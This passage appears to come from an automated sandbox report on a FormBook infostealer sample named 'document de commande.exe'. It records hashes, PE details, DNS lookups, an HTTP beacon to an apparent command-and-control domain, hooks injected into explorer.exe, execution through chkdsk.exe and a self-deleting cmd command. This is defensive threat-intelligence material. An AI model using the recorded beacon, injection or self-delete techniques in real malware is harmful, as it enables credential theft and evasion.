                                    • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    14:27:17API Interceptor1x Sleep call for process: document de commande.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    217.160.0.186order 00912.exeGet hashmaliciousBrowse
                                    • www.casaruralesgranada.com/dn7r/?CR-T=13xKs1CRhM6TBkg9XZx8aHv4jtF4dS/6+j4tMM4NOYQaHb7QxT/SxMO9vod8o8j/L6pK&iha4=sVV4_ZVPc

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    www.casaruralesgranada.comorder 00912.exeGet hashmaliciousBrowse
                                    • 217.160.0.186

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    ONEANDONE-ASBrauerstrasse48DEiAuPyHuUkk.exeGet hashmaliciousBrowse
                                    • 217.160.0.226
                                    vbc.exeGet hashmaliciousBrowse
                                    • 217.160.0.17
                                    justificante de la transfer.exeGet hashmaliciousBrowse
                                    • 212.227.15.158
                                    vURlUPQLT0.exeGet hashmaliciousBrowse
                                    • 74.208.236.170
                                    82051082.exeGet hashmaliciousBrowse
                                    • 213.171.195.105
                                    8205108.exeGet hashmaliciousBrowse
                                    • 74.208.236.156
                                    Lv9eznkydx.exeGet hashmaliciousBrowse
                                    • 217.160.0.238
                                    c9.dllGet hashmaliciousBrowse
                                    • 87.106.18.141
                                    2e.dllGet hashmaliciousBrowse
                                    • 87.106.18.141
                                    a3.exeGet hashmaliciousBrowse
                                    • 87.106.18.141
                                    a04.dllGet hashmaliciousBrowse
                                    • 87.106.18.141
                                    50.dllGet hashmaliciousBrowse
                                    • 87.106.18.141
                                    Quote -0071021.exeGet hashmaliciousBrowse
                                    • 217.160.0.7
                                    DHL SHIPMENT.HTMLGet hashmaliciousBrowse
                                    • 217.160.0.196
                                    hwIILTIn0n.exeGet hashmaliciousBrowse
                                    • 217.160.0.17
                                    just.exeGet hashmaliciousBrowse
                                    • 212.227.15.158
                                    2WK7SGkGVZ.exeGet hashmaliciousBrowse
                                    • 74.208.236.156
                                    0n1pEFuGKC.exeGet hashmaliciousBrowse
                                    • 74.208.236.145
                                    VmbABLKNbD.exeGet hashmaliciousBrowse
                                    • 74.208.236.108
                                    Update-KB250-x86.exeGet hashmaliciousBrowse
                                    • 74.208.5.20

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\document de commande.exe.log
                                    Process:C:\Users\user\Desktop\document de commande.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.355304211458859
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                    MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                    SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                    SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                    SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                    Malicious:true
                                    Reputation:high, very likely benign file
                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.841717396898349
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:document de commande.exe
                                    File size:566272
                                    MD5:1823dce627d29f5d4985501267f7ad9f
                                    SHA1:1ce10042fccf2c8fcb2b0a93723f24b6c3b4ffb3
                                    SHA256:c14ba2023f89dc57df157690e40042b8b090906257c59b6e5834b2212cd3142e
                                    SHA512:88421fa99979a5ed7d55a2dccffbb96af3e72539e5dba61bf7860d2321a2f79deb5e9aae65e3fb9e5a17998a60d87abbbdc7b0dc495c991b4a3813a2ef8edb72
                                    SSDEEP:12288:DMSSBQvlKxIhc8+PzqBpzZCRtDSybgO5Kdw06aDSBaEK:D0ByMstCvDS4h0dbDSB3
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Fea..............0.................. ........@.. ....................................@................................

                                    File Icon

                                    Icon Hash:00828e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x48b92e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x616546D1 [Tue Oct 12 08:26:57 2021 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    fcom dword ptr [edx+00h]
                                    add bl, ah
                                    movsd
                                    add byte ptr [eax], al
                                    pop esp
                                    stc
                                    add byte ptr [eax], al
                                    pop ecx
                                    dec ebp
                                    add dword ptr [eax], eax
                                    push es
                                    mov byte ptr [F7630001h], al
                                    add dword ptr [eax], eax
                                    mov dword ptr [ebp+02h], ecx
                                    add byte ptr [ebp-5Ch], bl
                                    add al, byte ptr [eax]

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8b8dc0x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x8c0000x380.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x8e0000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x89a1c0x89c00False0.921428368875data7.85154838784IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc0x8c0000x3800x400False0.3759765625data2.86719403238IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x8e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_VERSION0x8c0580x324data

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Version Infos

                                    DescriptionData
                                    Translation0x0000 0x04b0
                                    LegalCopyrightCopyright 2018 - 2021
                                    Assembly Version4.0.2.0
                                    InternalNameTimeZo.exe
                                    FileVersion4.0.2.0
                                    CompanyName
                                    LegalTrademarks
                                    Comments
                                    ProductNameWin Mixer
                                    ProductVersion4.0.2.0
                                    FileDescriptionWin Mixer
                                    OriginalFilenameTimeZo.exe

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 13, 2021 14:28:53.563572884 CEST4985380192.168.2.4217.160.0.186
                                    Oct 13, 2021 14:28:53.584919930 CEST8049853217.160.0.186192.168.2.4
                                    Oct 13, 2021 14:28:53.585025072 CEST4985380192.168.2.4217.160.0.186
                                    Oct 13, 2021 14:28:53.585150003 CEST4985380192.168.2.4217.160.0.186
                                    Oct 13, 2021 14:28:53.606367111 CEST8049853217.160.0.186192.168.2.4
                                    Oct 13, 2021 14:28:53.613244057 CEST8049853217.160.0.186192.168.2.4
                                    Oct 13, 2021 14:28:53.613272905 CEST8049853217.160.0.186192.168.2.4
                                    Oct 13, 2021 14:28:53.613290071 CEST8049853217.160.0.186192.168.2.4
                                    Oct 13, 2021 14:28:53.613624096 CEST4985380192.168.2.4217.160.0.186
                                    Oct 13, 2021 14:28:53.613663912 CEST4985380192.168.2.4217.160.0.186
                                    Oct 13, 2021 14:28:53.634888887 CEST8049853217.160.0.186192.168.2.4

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 13, 2021 14:28:33.296647072 CEST6407853192.168.2.48.8.8.8
                                    Oct 13, 2021 14:28:33.332494974 CEST53640788.8.8.8192.168.2.4
                                    Oct 13, 2021 14:28:53.538194895 CEST6480153192.168.2.48.8.8.8
                                    Oct 13, 2021 14:28:53.560286999 CEST53648018.8.8.8192.168.2.4
                                    Oct 13, 2021 14:29:14.900739908 CEST6152253192.168.2.48.8.8.8
                                    Oct 13, 2021 14:29:14.924463987 CEST53615228.8.8.8192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Oct 13, 2021 14:28:33.296647072 CEST192.168.2.48.8.8.80x153cStandard query (0)www.ecshopdemo.comA (IP address)IN (0x0001)
                                    Oct 13, 2021 14:28:53.538194895 CEST192.168.2.48.8.8.80xd0e3Standard query (0)www.casaruralesgranada.comA (IP address)IN (0x0001)
                                    Oct 13, 2021 14:29:14.900739908 CEST192.168.2.48.8.8.80x238Standard query (0)www.gaiaseyephotography.comA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Oct 13, 2021 14:28:33.332494974 CEST8.8.8.8192.168.2.40x153cName error (3)www.ecshopdemo.comnonenoneA (IP address)IN (0x0001)
                                    Oct 13, 2021 14:28:53.560286999 CEST8.8.8.8192.168.2.40xd0e3No error (0)www.casaruralesgranada.com217.160.0.186A (IP address)IN (0x0001)
                                    Oct 13, 2021 14:29:14.924463987 CEST8.8.8.8192.168.2.40x238Name error (3)www.gaiaseyephotography.comnonenoneA (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.casaruralesgranada.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.449853217.160.0.18680C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Oct 13, 2021 14:28:53.585150003 CEST5475OUTGET /dn7r/?iR-Tzb=13xKs1CRhM6TBkg9XZx8aHv4jtF4dS/6+j4tMM4NOYQaHb7QxT/SxMO9vodW3MT/P4hK&qVV8Aj=6lIHIj6PDtc HTTP/1.1
                                    Host: www.casaruralesgranada.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Oct 13, 2021 14:28:53.613244057 CEST5477INHTTP/1.1 404 Not Found
                                    Content-Type: text/html
                                    Content-Length: 1271
                                    Connection: close
                                    Date: Wed, 13 Oct 2021 12:28:53 GMT
                                    Server: Apache
                                    X-Frame-Options: deny
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 45 53 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'IONOSParkingES'
                                    Oct 13, 2021 14:28:53.613272905 CEST5477INData Raw: 20 20 20 20 20 20 20 20 2b 20 27 2f 70 61 72 6b 2e 6a 73 22 3e 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 3c 5c 2f 73 63 72 69 70 74 3e 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 29 3b 0a 20 20 3c 2f 73 63 72 69 70
                                    Data Ascii: + '/park.js">' + '<\/script>' ); </script> </body></html>


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function NameHook TypeActive in Processes
                                    PeekMessageAINLINEexplorer.exe
                                    PeekMessageWINLINEexplorer.exe
                                    GetMessageWINLINEexplorer.exe
                                    GetMessageAINLINEexplorer.exe

                                    Processes

                                    Process: explorer.exe, Module: user32.dll
                                    Function NameHook TypeNew Data
                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xED
                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xED
                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xED
                                    GetMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xED

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: document de commande.exe PID: 3116 Parent PID: 6484

                                    General

                                    Start time:14:27:10
                                    Start date:13/10/2021
                                    Path:C:\Users\user\Desktop\document de commande.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\document de commande.exe'
                                    Imagebase:0x220000
                                    File size:566272 bytes
                                    MD5 hash:1823DCE627D29F5D4985501267F7AD9F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: document de commande.exe PID: 6756 Parent PID: 3116

                                    General

                                    Start time:14:27:18
                                    Start date:13/10/2021
                                    Path:C:\Users\user\Desktop\document de commande.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\document de commande.exe
                                    Imagebase:0xfc0000
                                    File size:566272 bytes
                                    MD5 hash:1823DCE627D29F5D4985501267F7AD9F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: explorer.exe PID: 3424 Parent PID: 6756

                                    General

                                    Start time:14:27:19
                                    Start date:13/10/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff6fee60000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: chkdsk.exe PID: 6420 Parent PID: 3424

                                    General

                                    Start time:14:27:49
                                    Start date:13/10/2021
                                    Path:C:\Windows\SysWOW64\chkdsk.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                    Imagebase:0xf0000
                                    File size:23040 bytes
                                    MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    Chronological Activities

                                    Analysis Process: cmd.exe PID: 5888 Parent PID: 6420

                                    General

                                    Start time:14:27:53
                                    Start date:13/10/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del 'C:\Users\user\Desktop\document de commande.exe'
                                    Imagebase:0x11d0000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: conhost.exe PID: 6224 Parent PID: 5888

                                    General

                                    Start time:14:27:54
                                    Start date:13/10/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff724c50000
                                    File size:625664 bytes
